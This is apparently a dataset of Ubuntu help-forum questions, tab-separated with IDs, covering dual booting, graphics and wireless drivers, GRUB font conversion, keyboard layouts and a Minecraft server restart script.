] wl : unknown symbol cfg80211_connect_result ( err -22 ) [ 36.877772 ] wl : disagrees about version of symbol wiphy_unregister [ 36.877774 ] wl : unknown symbol wiphy_unregister ( err -22 ) [ 36.877783 ] wl : disagrees about version of symbol cfg80211_get_bss [ 36.877786 ] wl : unknown symbol cfg80211_get_bss ( err -22 ) [ 36.877793 ] wl : disagrees about version of symbol __ieee80211_get_channel [ 36.877795 ] wl : unknown symbol __ieee80211_get_channel ( err -22 ) [ 36.877819 ] wl : disagrees about version of symbol cfg80211_inform_bss_frame [ 36.877821 ] wl : unknown symbol cfg80211_inform_bss_frame ( err -22 ) [ 36.877832 ] wl : disagrees about version of symbol wiphy_free [ 36.877834 ] wl : unknown symbol wiphy_free ( err -22 ) ****************** done ******************
336502	what is this home folder in my downloads folder ?	i am trying to remove or delete acrobat 9 which is n't working properly but it is n't showing up in the synaptic package so i 've located it in a folder called 'home ' which is in my downloads folder . the home folder there is locked so i have a couple of questions . what is that 'home ' folder and why is it in the 'downloads ' folder ? how can i unlock folders to delete them ? i 'm told that i do n't have permission , but it 's my computer so why ?
336503	i ca n't get it to replace windows 8 !	i have a windows 8 installed laptop , and have installed ubuntu , but when i reboot my system , i am given a choice to choose ubuntu or windows 8 , when i choose ubuntu , the screen loads up and then repeats the question , this cycle is repeated endlessly , please tell me what i am doing wrong .
336506	linux on asus rog laptop	i 'm a linux enthusiast , and i 'm about to buy an asus republic of gamers laptop . does anyone know about installation issues or broken features in these laptops ?
336514	sudo service networking start does n't work	i just configured dns-nameservers in /etc/network/interfaces . to make it take effect instantly , i typed sudo service networking stop , the desktop seems to kill some processes , anyway the ui is down ... then i switch to ctrl+alt+f1 and type sudo service networking start . it prompts that networking stop/waiting . i 've tried several times and ca n't figure out what 's the reason . can anyone help me with this ? thank you !
336517	how to bind a application to start in a monitor ?	i have a ubuntu lts box with two monitors configured with nvidia x server settings software , so that the gui applications can be dragged between the two monitors . this configuration is fine and everything working as expected . the question is how to open a terminal start a xclock on monitor # 1 , then , start another xclock on monitor # 2 . i 've tried to use export display but does not work since both monitor display id are the same as :0 . can any one help ?
336518	why has ubuntu moved the default mount points ?	why has ubuntu and many other linux distributions moved the default mount points from /media to /media/ $ user example i plug in a usb drive and it 's name is ext4-250gb-usb it used to show up in /media/ext4-250gb-usb but now it shows up in /media/z/ext4-250gb-usb why is this and what 's the reason behind it ?
336520	how to properly uninstall ubuntu from dual boot ?	is there any other way than this uninstalling ubuntu from dual boot / change bootloader ? do n't have a windows 7 disk and my laptop wo n't go to recovery mode since the keys are broke on the laptop . is there any way to uninstall it without seeing no such partition grub rescue : thanks in advance
336525	initrd size seems large . related to nvidia driver ?	i 'm using a 100mb partition for /boot on a clean install of ubuntu 13.04 . with only 2 kernels on it , it 's already full . the biggest culprit seem to be both initrd ( 3.8.0.29 , 3.8.0.19 ) images are around 32mb each ( and a 22mb /boot/grub/unicode.pf2 ) . i 've used this same partition with an older install of 12.04 and i never had any problems with having multiple kernels . in fact , i had a whole ton of them . while looking this stuff up , i 've seen mention that it may be related to nvidia drivers . this would make sense because i encountered the `` /boot has no space '' error when trying to change my nvidia driver for the second time since the clean install . any thoughts on what i should do here ? it would be a real pain in the butt if i could only keep 2 kernels at any one time .
336526	how to set icon for tex files ?	in ubuntu 12.04 with all mate , cinamon , gnome , unity desktops , the following issue : i use latex frequently . my files end with extension .tex . the mime.types associated with tex is text/x-tex . the entry in /etc/mime.types for this is as follows : text/x-tex tex ltx sty cls thus the icon associated with tex files is the generic icon for all files of text category . i would like to have a special icon for all tex files only . it will make the things easier in finding from a folder which are tex files . how do i achieve it ? i have tried editing /etc/mime.types changing the above line to text/x-tex ltx sty cls and then entering another line : application/tex tex and then putting a special icon file application-tex.svg in /usr/share/icons/gnome/scalable/mimetype and then updating the icon cache ( logging out and in again ) . but that did not show the icon for tex files . help will be appreciated !
336527	how to upgrade ubuntu 12.04.2 , 12.04.3 to 12.04.4 , the next hardware enablement stack ?	i am currently using ubuntu 12.04.2 32bit . i installed it using livecd . tomorrow , 23rd august 2013 , ubuntu 12.04.3 is released . i want to upgrade from ubuntu 12.04.2 to ubuntu 12.04.3 without using any livecd . is it possible ? if so please suggest me how can i do . actually while using ubuntu 12.04.2 i have troubled with graphics . my graphics card is intel i845g 64 mb . when ubuntu starts it works fine and smooth without any lagging , but after sometime it hangs for few seconds ( 1 or 2 seconds ) with a garbage screen and becomes sluggish . all windows and browsers start lagging and also it is not possible to play any video in any player ( vlc , movie player , xnoise , smplayer etc.. ) . i think upgrading to ubuntu 12.04.3 could fix my problem . any help will be greatly appreciated.. i 've posted an answer to upgrade ubuntu 12.04.x to 12.04.4 . find it here
336531	ubuntu 12.04.2 with intel i845 graphics becomes sluggish after few minutes of system startup	i am currently using ubuntu 12.04.2 lts installed from livecd . it works fine when system boots but after sometime it hangs for few seconds ( about 2 to 4 seconds ) showing a garbage screen and then becomes sluggish . it happens every time i boot my system . i think that it is because of my graphics card driver . i have intel i845g 64 mb of graphics card . i have tried updating my xserver-xorg-video-intel graphics driver , but sometimes it becomes more sluggish at time of boot itself . i am searching for this solution for a very long time but was not successful . if someone knows please help me . any help will be greatly appreciated . saurav kumar ( saur.k10 @ gmail.com )
336536	i am getting the black screen in startup	i am using ubuntu 12.04 lts . actually i upgraded my system from 11.10 to 12.04 using terminal . at first it works fine after some days , i am getting the black screen while starting the system . i am able to login after 4 to 5 times of rebooting every day . some times it takes 10 times to login . i think this is because of me running a wrong command on the system and i tried other answers in askubuntu.com it does n't worked for me . what am i supposed to do ? please do let me know this is a ubuntu system and not booted with any cd and upgraded my ubuntu version using terminal .
336538	ubuntu:12:10 x11 ca n't find screen	i 've just updated my ubuntu dual boot with windows . and when i satarted it last night the screen said no signal . just now i have got it to the comand line or something like that and when i run startx it errors and says there is no screen . i have not been able to find any thing to help from googling the error .
336541	gnupg - how can ubuntu encrypt messages automatically	i am running a 12.04lts ubuntu server ( linux myserver 3.2.0-52-generic-pae # 78-ubuntu smp fri jul 26 16:43:19 utc 2013 i686 athlon i386 gnu/linux ) with a fqdn and an exim4 mailserver . user alice has uid1000 and is getting the messages from root , messages send to root by local services and is getting messages from various cron jobs executed by root and alice . i have also generated a gnupg keypair for alice @ myfqdn.net . what i want to do , is that the system encrypts the messages generated locally `` automatically '' sent to root , generated by root and generated by alice . so i do not know , if i have to tell the system , the services or exim to encrypt the messages . kindly waiting for your help and a hint in the wright direction , elrippo .
336549	not sure which ide i should use for editing codes written in c	i am looking for an ide which i can use to edit/compile/run c/c++ codes on my ubuntu 13.04 installation . i have been checking the forum for information , and i found anjuta being suggested by a few other users , but then i found this entry : looking for ide compiler to build and run a .c source file without creating a project and the user faced problems running the codes . now , i have n't downloaded any software to try them out for the purpose yet , but i want to be sure before i download any . i am used to using dev c++ on windows which allows the user to create projects , compile , save and run codes . is there anything similar for ubuntu ? thanks in advance for any help on this .
336552	what are orcexec files ?	apparmor shows various programs need read access to files with names like `` orcexec.3jikju84 '' . it 's always orcexec . * which allows for them to be read . what is the purpose of these files ?
336553	svnserve startup no longer works as documented	the documented methods of starting svnserve no longer work in ubuntu 12.04 lts . ref : https : //help.ubuntu.com/community/subversion '' inetd '' scripts are obsolete . `` xinetd '' scripts are now nonstandard . the suggested third-party upstart script at http : //pelam.fi/published_sources/svnserve.conf looks bogus . it has the line exec /usr/bin/svnserve -- foreground -- daemon -- config-file /etc/svnserve.conf -- root /home/svn/ which uses an option `` -- config-file '' not in the svnserve documentation , runs in the foreground ( inappropriate for a daemon ) , and appears to run as root . upstart runs everything as root by default . `` a future release of upstart will have native support for ( not running as root ) '' . this should have been handled during ubuntu packaging . how do i work around this mess ?
336557	geting error message `` e : unable to locate package qt3-dev-tools ''	i 'm trying to install wine in ubuntu 13.04 using the following steps : sudo apt-get install flex bison qt3-dev-tools qt4-qmake wget -c http : //prdownloads.sourceforge.net/wine/wine-1.6.tar.bz2 tar -xjvf wine-1.6.tar.bz2 cd wine-1.6* ./configure cd tools ./wineinstall and getting this error message : e : unable to locate package qt3-dev-tools tell me what to do . i 'm new to ubuntu .
336559	ddrescue is taking ages	ok , so my hard disk crashed the other day and i sent the entire notebook for servicing ; now i have a brand new hard disk installed in it and the damaged one out in the open . i 've installed ubuntu and ddrescue with the intention of recovering all data from the c drive ( 200gb ) ; so far it 's been about 2 hours and i think it 's going to be a very long time . i ran the following line : sudo dd_rescue /dev/sdb2 /mnt/sda4/backup.img things started looking good ; it expected to retrieve 195354624kb from /dev/sdb2 and started copying stuff ; however it 's copying in chunks of 2119808kb with avg.rate of just above 400kb/s and an eta of almost 130:00:00 . i have to wait 5 days just to get all my data out ? ! this webpage says that he took just 12+h to do 1tb , but given that my hard disk is damaged i should expect the time taken to be longer . should i be optimistic and pray that it 'd take less than 5 days ? currently the state of the hard disk is so bad that i ca n't view any of the files in windows , the c drive says it 's corrupted and unreadable , and the d drive hangs up the system when navigating through the files , and eventually disconnects each and every single time . is there any way to expedite ddrescue ( while preserving as much data as possible ) , or am i doing something wrong ?
336563	driver print brother dcp-195c ubuntu 13.04 32 bits	i have a brother dcp-195c printer ubuntu 13.04 32-bit scanner works but the printer does not print works but there is nothing on the paper out of the printer
336564	changing default font in grub2 - 'unknown gsub font feature '	i wanted to change a default grub2 because it 's to small for me . i downloaded ubuntu font and tried to convert it to *.pf2 : grub-mkfont -s -16 -- range=0x0-0x7f -o ./ubufont.pf2 ubuntufont.ttf but it showed some 'errors ' and font was n't created : unknown gsub font feature gsub 0x63617365 ( case ) unknown gsub font feature gsub 0x63617365 ( case ) unknown gsub font feature gsub 0x63617365 ( case ) unknown gsub font feature gsub 0x63617365 ( case ) unknown gsub font feature gsub 0x63617365 ( case ) unknown gsub font feature gsub 0x63617365 ( case ) unknown gsub font feature gsub 0x63617365 ( case ) unknown gsub font feature gsub 0x63617365 ( case ) unknown gsub font feature gsub 0x63617365 ( case ) unknown gsub font feature gsub 0x646e6f6d ( dnom ) unknown gsub font feature gsub 0x646e6f6d ( dnom ) unknown gsub font feature gsub 0x646e6f6d ( dnom ) unknown gsub font feature gsub 0x646e6f6d ( dnom ) unknown gsub font feature gsub 0x646e6f6d ( dnom ) unknown gsub font feature gsub 0x646e6f6d ( dnom ) unknown gsub font feature gsub 0x646e6f6d ( dnom ) unknown gsub font feature gsub 0x646e6f6d ( dnom ) unknown gsub font feature gsub 0x646e6f6d ( dnom ) unknown gsub font feature gsub 0x646e6f6d ( dnom ) unknown gsub font feature gsub 0x646e6f6d ( dnom ) unknown gsub font feature gsub 0x66726163 ( frac ) unknown gsub font feature gsub 0x66726163 ( frac ) unknown gsub font feature gsub 0x66726163 ( frac ) unknown gsub font feature gsub 0x66726163 ( frac ) unknown gsub font feature gsub 0x66726163 ( frac ) unknown gsub font feature gsub 0x66726163 ( frac ) unknown gsub font feature gsub 0x66726163 ( frac ) unknown gsub font feature gsub 0x66726163 ( frac ) unknown gsub font feature gsub 0x66726163 ( frac ) unknown gsub font feature gsub 0x66726163 ( frac ) unknown gsub font feature gsub 0x66726163 ( frac ) unknown gsub font feature gsub 0x6c6f636c ( locl ) unknown gsub font feature gsub 0x6c6f636c ( locl ) unknown gsub font feature gsub 0x6c6f636c ( locl ) unknown gsub font feature gsub 0x6c6f636c ( locl ) unknown gsub font feature gsub 0x6c6f636c ( locl ) unknown gsub font feature gsub 0x6c6f636c ( locl ) unknown gsub font feature gsub 0x6e756d72 ( numr ) unknown gsub font feature gsub 0x6e756d72 ( numr ) unknown gsub font feature gsub 0x6e756d72 ( numr ) unknown gsub font feature gsub 0x6e756d72 ( numr ) unknown gsub font feature gsub 0x6e756d72 ( numr ) unknown gsub font feature gsub 0x6e756d72 ( numr ) unknown gsub font feature gsub 0x6e756d72 ( numr ) unknown gsub font feature gsub 0x6e756d72 ( numr ) unknown gsub font feature gsub 0x6e756d72 ( numr ) unknown gsub font feature gsub 0x6e756d72 ( numr ) unknown gsub font feature gsub 0x6e756d72 ( numr ) unknown gsub font feature gsub 0x6f72646e ( ordn ) unknown gsub font feature gsub 0x706e756d ( pnum ) unknown gsub font feature gsub 0x706e756d ( pnum ) unknown gsub font feature gsub 0x706e756d ( pnum ) unknown gsub font feature gsub 0x706e756d ( pnum ) unknown gsub font feature gsub 0x706e756d ( pnum ) unknown gsub font feature gsub 0x706e756d ( pnum ) unknown gsub font feature gsub 0x706e756d ( pnum ) unknown gsub font feature gsub 0x706e756d ( pnum ) unknown gsub font feature gsub 0x706e756d ( pnum ) unknown gsub font feature gsub 0x706e756d ( pnum ) unknown gsub font feature gsub 0x706e756d ( pnum ) unknown gsub font feature gsub 0x73616c74 ( salt ) unknown gsub font feature gsub 0x73616c74 ( salt ) unknown gsub font feature gsub 0x73696e66 ( sinf ) unknown gsub font feature gsub 0x73696e66 ( sinf ) unknown gsub font feature gsub 0x73696e66 ( sinf ) unknown gsub font feature gsub 0x73696e66 ( sinf ) unknown gsub font feature gsub 0x73696e66 ( sinf ) unknown gsub font feature gsub 0x73696e66 ( sinf ) unknown gsub font feature gsub 0x73696e66 ( sinf ) unknown gsub font feature gsub 0x73696e66 ( sinf ) unknown gsub font feature gsub 0x73696e66 ( sinf ) unknown gsub font feature gsub 0x73696e66 ( sinf ) unknown gsub font feature gsub 0x73696e66 ( sinf ) unknown gsub font feature gsub 0x73733031 ( ss01 ) unknown gsub font feature gsub 0x73733031 ( ss01 ) unknown gsub font feature gsub 0x73756273 ( subs ) unknown gsub font feature gsub 0x73756273 ( subs ) unknown gsub font feature gsub 0x73756273 ( subs ) unknown gsub font feature gsub 0x73756273 ( subs ) unknown gsub font feature gsub 0x73756273 ( subs ) unknown gsub font feature gsub 0x73756273 ( subs ) unknown gsub font feature gsub 0x73756273 ( subs ) unknown gsub font feature gsub 0x73756273 ( subs ) unknown gsub font feature gsub 0x73756273 ( subs ) unknown gsub font feature gsub 0x73756273 ( subs ) unknown gsub font feature gsub 0x73756273 ( subs ) unknown gsub font feature gsub 0x73757073 ( sups ) unknown gsub font feature gsub 0x73757073 ( sups ) unknown gsub font feature gsub 0x73757073 ( sups ) unknown gsub font feature gsub 0x73757073 ( sups ) unknown gsub font feature gsub 0x73757073 ( sups ) unknown gsub font feature gsub 0x73757073 ( sups ) unknown gsub font feature gsub 0x73757073 ( sups ) unknown gsub font feature gsub 0x73757073 ( sups ) unknown gsub font feature gsub 0x73757073 ( sups ) unknown gsub font feature gsub 0x73757073 ( sups ) unknown gsub font feature gsub 0x73757073 ( sups ) unknown gsub font feature gsub 0x746e756d ( tnum ) unknown gsub font feature gsub 0x746e756d ( tnum ) unknown gsub font feature gsub 0x746e756d ( tnum ) unknown gsub font feature gsub 0x746e756d ( tnum ) unknown gsub font feature gsub 0x746e756d ( tnum ) unknown gsub font feature gsub 0x746e756d ( tnum ) unknown gsub font feature gsub 0x746e756d ( tnum ) unknown gsub font feature gsub 0x746e756d ( tnum ) unknown gsub font feature gsub 0x746e756d ( tnum ) unknown gsub font feature gsub 0x746e756d ( tnum ) unknown gsub font feature gsub 0x746e756d ( tnum ) so how can i change default grub2 font to ubuntu font ? cheers
336565	give the same rights to two users	let 's say i have 2 users : user1 and user2 i would like to give user1 the same permissions as user2 but i do n't want user2 having the same permission as user 1 . sorry for my english . thank you
336566	pipe not working for wireshark	im trying to use wireshark in my test enironment where i have two vm 's with ip address 192.168.0.1 and 192.168.0.2 im trying to monitor the data of the machine 192.168.0.2 from the machine at 192.168.0.1 using wireshark with tcpdump i got to know from the tutorial here . now , i made the pipe using the command mkfifo /tmp/pipes/cap_fwd it was created but when i try to do the second step that is ssh to the machine to run tcpdump and redirect its output to the pipe it does n't work as the ssh does n't gets completed the cursor keeps on blinking and does n't gets executed . see the image below . p.s . when i try to get the output of tcpdump on a normal file it does it easily so i believe the pipe is not working here . please help . edit 1 1.i have checked the permission of the pipe and set it to full permissions for now . 2.i have created the pipe on my machine at ip 192.168.0.1 do i have to configure anything at the machine on 192.168.0.2 edit 2 comment on the tutorial website by one of the user i 'm having the same problem . i tried to run it on my openwrt box , from ubuntu 10.10 , but when i execute the command ssh root @ 192.168.1.1 -p 443 “tcpdump -i eth0 -s 0 -u -w – not port 443″ > /tmp/pipes/cap_fw nothing happens ( it should ask me the pw i suppose , but it doesn’t ) , it acts like if i didn’t press return… the dropbear daemon is running on port 443 with pw login ( no certificate ) also he added later it was only a problem of not using certificates with ssh , now it works correctly thanks ! is this really the case of not using certificates as i too am not using any certificates for ssh .
336571	command tab completion of arguments from folder	is it possible to create a list of completions for a command based on some folder 's files ? say i want to run sublime text 2 on one of my projects , which are saved as ~/sublime_projects/*.sublime-project . desired behaviour : subl < tab > < tab > foo bar project2 in case there are foo.sublime-project , bar.sublime-project , project2.sublime-project files in ~/sublime_projects .
336572	connect to wifi and broadband	i have a bsnl broadband connection . using windows os we connect our broadband in a different method : when i start my d-link modem , my win 7 wireless shows a connection that does n't need any password . i just click it , then i connect . after that i go to the network sharing center and click ppope and type my isp 's username and password and click âconnectâ , then it connects . for connecting i need wireless connection and after that ppope . so i need to know how to get connected in ubuntu with that . how do i do it ?
336584	update manager/software centre not working ( 12.04 lts )	i restarted my computer and a little red circle with a horizontal white line appeared . i clicked on it and it asked me to show updates , so i did that . next , it says this : an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : type 'ain ' is not known on line 3 in source list /etc/apt/sources.list.d/ehoover-compholio-precise.list , e : the list of sources could not be read. , e : the package lists or status file could not be parsed or opened . ' can anyone please help me ?
336590	error while compiling	i need to compile a simple display image code in opencv on ubuntu linux platform but i am getting some errors as follows : gcc : error : ‘pkg-config : no such file or directory gcc : error : opencv‘ : no such file or directory gcc : error : unrecognized option ‘ -- cflags’ gcc : error : unrecognized option ‘ -- libs’ please can some one help me ?
336591	add main menu to dockbarx in 13.04	since cardapio is no longer supported in ubuntu 13.04 can you tell me which main menu i can use on dockbarx in ubuntu 13.04 .
336597	how to dual boot windows 7 x64 and ubuntu 13.04 x64 as bios , not efi	i wanted to dual boot windows 7 64-bit and ubuntu 13.04 ( raring ringtail ) 64-bit , but when i installed it , it did n't boot . only windows was booting . i installed ubuntu with a `` / `` of 50 gb and a `` swap '' partition of 4 gb . could it be that it does n't work , because i 'm on bios mode , and that my disk is mbr , not gpt ? my laptop does n't have an option to change boot mode to uefi so as much as possible , i 'd stick to mbr : ( system acer aspire 4755g intel i5-2450m 2.5 ghz - 3.1 ghz nvidia [ geforce gt540m ] [ 7 ] 2 gb 4 gb ram ddr3
336609	how to make ubuntu switcher bring to front windows while i 'm holding `` alt+tab '' ?	is there a way to have the instant `` bring-to-front '' feature under ubuntu while `` alt+tab '' are being hold ? just as it is under you know which os .
336611	ubuntu on ssd and windows	i have recently bought a laptop with 32gb ssd and 750 gb hdd . due to my job i need both windows and linux ( i use more linux than windows ) . i want to install first windows 7 on the hdd and later ubuntu on the ssd ( /home on the hdd ) do you think it is a good idea ?
336618	why does my cat /etc/fstab look so odd ? is there a way to format the output ?	when i run cat /etc/fstab i see this : i get the impression that the output is n't formatted correctly as a table should be . my terminal is full screen and so i do n't think `` wrapping '' is to blame . other commands such as sudo fdisk -l and sudo parted -l appear well-formatted on screen with data in nice columns .
336619	not able to login through gui in ubuntu 12.04	i 'm unable to login through gui . on typing the correct password , i get a black screen and back to login screen . however , when tried with tty1 i was logged in . then i tried reinstalling lightdm and xorg packages , but in vain . these are the contents of my xsession-errors /usr/sbin/lightdm-session : 1 : /etc/profile : id : not found /usr/sbin/lightdm-session : 12 : [ : illegal number : /usr/sbin/lightdm-session : 36 : /usr/sbin/lightdm-session : xrdb : not found /usr/sbin/lightdm-session : 1 : /usr/sbin/lightdm-session : ls : not found /usr/sbin/lightdm-session : 98 : exec : gnome-session : not found how do i overcome this issue ? update 1 : image of my /etc/profile
336622	does laptop brightness change on battery ( like windows ) ?	i 've been looking for a new laptop , and lots of reviews of the gaming machines talk of the display dimming when on battery , and being unavoidable . is this also true for linux/ubuntu , or is it a hardware configuration outside os control ? i know it 'll affect battery life , but if i 'm outside for 30 min , then i still want the option of using my computer ...
336629	wireless signal strength problem on lenovo b490	i have removed windows 8 and installed ubuntu 13.04 ( 64bit ) on lenovo b490 laptops . the problem i get is extremely bad wireless signal . even if the router is located in the same room within close proximity , the signal is extremely low ! is there a specific driver i should install ?
336631	no sound in ubuntu 13.04 64bit in dual boot with windows 7 pro 64bit	i have installed ubuntu 13.04 64bit on windows 7 pro 64bit enabling myself the service of dual boot . i am facing a problem of `` no sound '' in any of the player even after installing all of the updates and the gstreamer drivers requested by the rhythmbox . i tried installing pulseaudio drivers once more after purge remove but still no result . can someone please help ? i found some odd problem regarding the sound on ubuntu 13.04 . my motherboard intel dg43rk has 10.1 channel i.e various ports for various sound devices . the sound is only working in the front port which comes by default attached onto the cpu cabinet and not on any of the ports of the motherboard . how can this be solved ?
336635	ubuntu touch install syntax error	i encountered an error while trying to install ubuntu touch on my nexus 4 . after the following command : phablet-flash ( cdimage-touch|cdimage-legacy|ubuntu-system|community ) -b i received an error saying : syntax error near unexpected token 'cdimage-touch' anyone know where i 'm going wrong ? thanks
336637	keyboard layout keeps allways falling back to default after reboot - how to change ?	i have chromebook acer c7 and i like it . it 's fast etc . to install *buntu linux on it i did use crouton . it 's a program who install *buntu on chromeos without erace the orginal system . anyway ! i have problem with the keyboard layout . i have swedish keyboard but the keyboard layout in the system is us keyboard . i can install swedish keyboard layout by using this command : sudo dpkg-reconfigure keyboard-configuration after that , i have swedish keyboard layout . but after i reboot i falling back the the us keyboard layout . ( precise ) acer @ localhost : ~ $ sudo dpkg-reconfigure keyboard-configuration perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` sv_sv.utf-8 '' , lc_all = ( unset ) , lang = `` sv_sv.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory /usr/bin/locale : can not set lc_ctype to default locale : no such file or directory /usr/bin/locale : can not set lc_messages to default locale : no such file or directory /usr/bin/locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` sv_sv.utf-8 '' , lc_all = ( unset ) , lang = `` sv_sv.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . your console font configuration will be updated the next time your system boots . if you want to update it now , run 'setupcon ' from a virtual console . perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` sv_sv.utf-8 '' , lc_all = ( unset ) , lang = `` sv_sv.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . update-initramfs : deferring update ( trigger activated ) ( precise ) acer @ localhost : ~ $ here is /etc/default/keyboard ( precise ) acer @ localhost : ~ $ cat /etc/default/keyboard # check /usr/share/doc/keyboard-configuration/readme.debian for # documentation on what to do after having modified this file . # the following variables describe your keyboard and can have the same # values as the xkbmodel , xkblayout , xkbvariant and xkboptions options # in /etc/x11/xorg.conf . xkbmodel= '' '' xkblayout= '' se '' xkbvariant= '' '' xkboptions= '' terminate : ctrl_alt_bksp '' # if you do n't want to use the xkb layout on the console , you can # specify an alternative keymap . make sure it will be accessible # before /usr is mounted . # kmap=/etc/console-setup/defkeymap.kmap.gz ( precise ) acer @ localhost : ~ $ here is /etc/default/locale ( precise ) acer @ localhost : ~ $ cat /etc/default/locale # file generated by update-locale lang= '' sv_sv.utf-8 '' language= '' sv_sv.utf-8 '' ( precise ) acer @ localhost : ~ $ best regards acer
336638	trying to restore files from ubuntu one , get error 401	i had a system crash on my laptop . i had to do a fresh install , and now i want to restore my backed up home directory from ubuntu one . everything starts out fine , it asks me for my encryption password , and after several minutes it gives me an error 401 . what little i have been able to find about this suggests it is a server side error , i hope there is something i can do about it . if deja-dup wo n't work remotely , i would be happy to download the backup files and run deja-dup remotely . but i do n't see how to download files from my ubuntu one account . i do n't want to sync anything , just download . there is an upload button , but no apparent way to download anything . it must be possible to ftp my own stuff back to my computer ? thanks .
336641	why is the iso size for 12.04.3 larger than a cd ?	why is the ubuntu 12lts 4mb bigger than all the blank cds i have ? i had to burn it on to a dvd . this never used to be the case .
336646	e books , websites , magazines , applications etc to learn qml	i wish to learn qml so that i could code in ubuntu sdk effectively . so can you name some books , websites , apps etc so i could learn qml ? i have good experience of programming in c++ . but not so in python.qml being part of java , can knowledge of c++ help in learning qml ? ( because people say its easy to learn java having knowledge of c++ ) i ca n't have a professional course because i 'm currently completing my junior college.lol . i think i could make some money for my future education by programming for android and ubuntu
336650	problem in creating all default directories while adding a new user account in ubuntu 12.04 ?	i am facing a bizarre problem recently in ubuntu 12.04 while adding a new user . user adding command such as useradd -d /home/username -s /bin/bash -m username in the terminal only creates a example-ubuntu folder in the user 's home but not the downloads , documents , pictures , music , etc . note that just before this , i had a problem with `` login '' probably due to interrupted ubuntu updating . so , i fixed the problem by : re-installing `` ubuntu-desktop '' re-configuring `` lightdm '' installing `` unity and unity-2d '' by searching ubuntu blogs . now login problem is fixed , but useradd is not . so , i would really appreciate any help in this matter if anyone knows . mahboob
336651	search command for packages in ubuntu terminal to search updates and patches of the package specifically	can i know what is the command to search any package using the terminal , if i only know the name of the software like , if i want to search vlc or jdk , jre.. etc if i do not know what is the url where i get them to download i might search them through the internet , but downloading them and extracting them and then installing becomes a lengthy procedure . so i wanted to know is there any command to search the package via their names or part of names ?
336652	blank screen after first login 13.04 ; mouse visible	just installed 13.04 32 bit on a thinkpad r32 . i can log in fine , but then the screen goes to a blank ( mulitcolored ) screen . the mouse pointer works fine , but that is it . when i move the mouse to the center of the screen , it changes like it is over a text input box ( maybe a 'please register ' type of thing ? ? ) but it is not visible , just the multi colored desktop . no other icons or anything . please help ( i am a first time linux user ) .
336653	always boot to gui	i 've got an old that sits and does some of the grunt work in the house . i 've recently got it running 12.04 from 10.x , and everything seems to be working brilliantly . unfortunately though , it only seems to boot to the gui when a screen is attached , and drops to tui when there is n't . since i mostly log into it via rdp , i 'd rather it booted to gui regardless of whether it has it 's own screen plugged in or not . is there a setting i can change somewhere to disable tui boot ?
336655	do i need to reinstall all my softwares after upgrading ubuntu 12.10 to 13.04 ?	i was stopped by my sister from upgrading ubuntu , for the reason she explained was that i would have to reinstall all the softwares that i 've installed in last 6 months . but i think if that 's the case , the upgrade itself includes all softwares that i have installed . so please tell me what 's the truth ? please note that i just ca n't afford mentally to reinstall all apps due to slow internet speed.because it may take 3 to 4 days of constant downloading . if you are an indian living in an suburban city , you can understand my situation . i think the question itself explains everything.still i 'll explain everything in detail.i want to upgrade my current ubuntu 12.10 os to 13.10 ( now please do n't ask what is 13.10 ) . this option is available from `` about this computer '' and many other places.the upgrade is of about 700mb to 800 mb . btw , i do n't know why i think it 's a rule here to put some question on questions asked here , however detailed or/and simple it may be.at least that 's what i feel after looking at many questions .
336665	i cant boot into lubuntu grub wont show up	i have recently installed lubuntu as a dual boot system with windows 8 and now it just default boots to windows . ive tried holding shift but nothing happens . if i hold esc i can go to the boot menu but when i try to boot lubuntu from there it comes up as an error . and to clarify i cant get into linux at all so changing grub from there is not an option .
336679	trying to dual boot windows 7 and 12.04 using live dvd	i 'm trying to dual boot my computer with windows 7 and ubuntu 12.04 , but i 'm having absolutely no luck getting it done . windows 7 was pre-installed on my computer . i 've crated a 90 gb partition for the os , downloaded the 64-bit .iso file from the website ( my computer is a 64-bit machine ) , burned it to a dvd , and restarted . however , i get an error message saying that the file could not be read and that a kernel panic occurred . i have no idea how to fix this . help ? ps : i also tried an install using a live usb , and my computer did n't even recognize the usb drive .
336680	multitouch gestures on 15 '' retina macbookpro and ubuntu 13	how do i enable multitouch gestures like pinch & zoom , three fingers drag , 4 fingers swipe ( basically what osx has ) in ubuntu 13 on 15 '' retina macbookpro ? the basic 1 tap for clicking and 2 fingers to scroll work ok for me . a few articles exist for multitouch gestures in ubuntu 12 , but nothing convincing for ubuntu 13 .
336684	unable to unmount the modem	am using usb modem and i try to safely remove the modem but it gives the following message . error detaching : helper exited with exit code 1 : detaching device/dev/sdb usb device : /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2 ) synchronize cache failed : no such file or directory ( continuing despite synchronize cache failure . ) stop unit : no file or such directory
336686	executing a script as another user still cause some permission trouble	i have to execute this script with php . the user www-data ca n't do it , so i modified the sudoers file : www-data all= ( user2 ) nopasswd : /home/user2/bin/test.sh the script is executed in php with this command : sudo -u user2 /home/user2/bin/test.sh here is test.sh script : # ! /bin/bash # stopping previous server screen -s minecraft -x stuff `` stop^m '' # deleting the map file rm -rf /home/minecraft/serveur/*/ # deleting the properties file rm -f /home/minecraft/serveur/server.properties # new server properties cp /home/minecraft/mapsetserv.prop/bloody/server.properties /home/minecraft/serveur/server.properties # new map cp -r /home/minecraft/mapsetserv.prop/bloody/'bloody mess v1.0 ' /home/minecraft/serveur/'bloody mess v1.0 ' # launching the game server screen -dms minecraft java -xmx4096m -xms4096m -jar /home/minecraft/serveur/minecraft_server.jar nogui /home/minecraft/serveur and /home/minecraft/mapsetserv.prop permissions are set to 777 . what happens when i execute the script via ssh : everything works fine . but when i execute it with php : the screen is stopped , the files are paste and the screen is launched . but there is a problem : the game server is not running . edit : the probleme is solved ! i just added a cd /home/minecraft/serveur/ at the beginning of the script and everything works just fine : )
